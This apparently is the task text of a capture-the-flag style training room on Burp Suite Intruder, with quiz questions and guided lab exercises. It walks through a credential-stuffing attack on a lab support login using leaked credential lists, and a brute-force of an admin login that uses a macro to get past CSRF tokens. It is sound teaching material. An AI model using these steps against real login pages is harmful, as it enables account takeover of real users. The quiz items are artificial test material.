Introduction Room Outline

Deploy the machine!
You should also deploy the AttackBox (using the "Start AttackBox" button at the top of the page) if you are not using your own attack VM.

Intruder What is Intruder?

Which section of the Options sub-tab allows you to control what information will be captured in the Intruder results?

In which Intruder sub-tab can we define the "Attack type" for our planned attack?

Intruder Positions

Have a play around with the positions selector. Make sure that you are comfortable with the processes of adding, clearing, and automatically selecting positions.

Clear all selected positions.

Select the value of the "Host" header and add it as a position.

Clear this position, then click the "Auto" button again to reselect the default positions.
Your editor should be back looking like it did in the first screenshot of this task.

Attack Types Introduction

Read the Attack Types Introduction.

Attack Types Sniper

If you were using Sniper to fuzz three parameters in a request, with a wordlist containing 100 words, how many requests would Burp Suite need to send to complete the attack?

How many sets of payloads will Sniper accept for conducting an attack?

Sniper is good for attacks where we are only attacking a single parameter, aye or nay?

Attack Types Battering Ram

As a hypothetical question: you need to perform a Battering Ram Intruder attack on the example request above.
If you have a wordlist with two words in it (admin and Guest) and the positions in the request template look like this:
username=§pentester§&password=§Expl01ted§
What would the body parameters of the first request that Burp Suite sends be?

Attack Types Pitchfork

What is the maximum number of payload sets we can load into Intruder in Pitchfork mode?

Attack Types Cluster Bomb

We have three payload sets. The first set contains 100 lines; the second contains 2 lines; and the third contains 30 lines.
How many requests will Intruder make using these payload sets in a Cluster Bomb attack?

Intruder Payloads

Which payload type lets us load a list of words into a payload set?

Which Payload Processing rule could we use to add characters at the end of each payload in the set?

Practical Example

Download and unzip the BastionHostingCreds.zip zipfile. It doesn't matter whether you do this by clicking the download link in the task or by using the files hosted on your deployed machine.

These contain lists of leaked emails, usernames, and passwords, respectively. The last list contains the combined email and password lists.
We will be using the usernames.txt and passwords.txt lists.

Activate the Burp Proxy and try to log in, catching the request in your proxy.

Send the request from the Proxy to Intruder by right-clicking and selecting "Send to Intruder" or by using the Ctrl + I shortcut.

Looking in the "Positions" sub-tab, we should see that the auto-selection should have chosen the username and password parameters, so we don't need to do anything else in terms of defining our positions. If you have already visited certain other pages on the site, then you may have a session cookie. If so, this will also be selected -- make sure to clear your positions and select only the username and passwords fields if this happens to you.
We also need the Attack type to be "Pitchfork":

Although these aren't named, we know from the fact that the username field is to the left of the password field that the first position will be for usernames, and the second position will be for passwords.
We can leave both of these as the "Simple list" payload type.
In the first payload set, go to "Payload Options", choose "Load", then select our list of usernames.
Do the same thing for the second payload set and the list of passwords.

We have done all we need to do for this very simple attack, so go ahead and click the "Start Attack" button. A warning about the rate-limiting in Burp Community will appear. Click "Ok" and start the attack!

Once we have sorted our results, one request should stand out as being different!

Well done, you have successfully bruteforced the support login page with a credential stuffing attack!

Practical Challenge

Which attack type is best suited for this task?

You should find that at least five tickets will be returned with a status code of 200, indicating that they exist.

What is the flag?

Extra Mile

Navigate to http://10.10.182.68/admin/login/.
Activate the Burp Proxy and attempt to log in. Capture the request and send it to Intruder.

Configure the positions the same way as we did for bruteforcing the support login

Now switch over to the Payloads sub-tab and load in the same username and password wordlists we used for the support login attack.
Up until this point, we have configured Intruder in almost the same way as our previous credential stuffing attack; this is where things start to get more complicated.

There are a lot of steps here, comparatively speaking, so the following GIF shows the entire process:

Again, here is a GIF showing these steps of the process:

The following GIF demonstrates this final stage of the process:

Click "Ok", and we're done!

You should now have a macro defined that will substitute in the CSRF token and session cookie. All that's left to do is switch back to Intruder and start the attack!

As with the support login credential stuffing attack we carried out, the response codes here are all the same (302 Redirects). Once again, order your responses by Length to find the valid credentials. Your results won't be quite as clear-cut as last time -- you will see quite a few different response lengths: however, the response that indicates a successful login should still stand out as being quite significantly shorter.

Use the credentials you just found to log in (you may need to refresh the login page before entering the credentials).

Conclusion Conclusion

I can use Intruder!

[Bonus Question -- Optional] Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.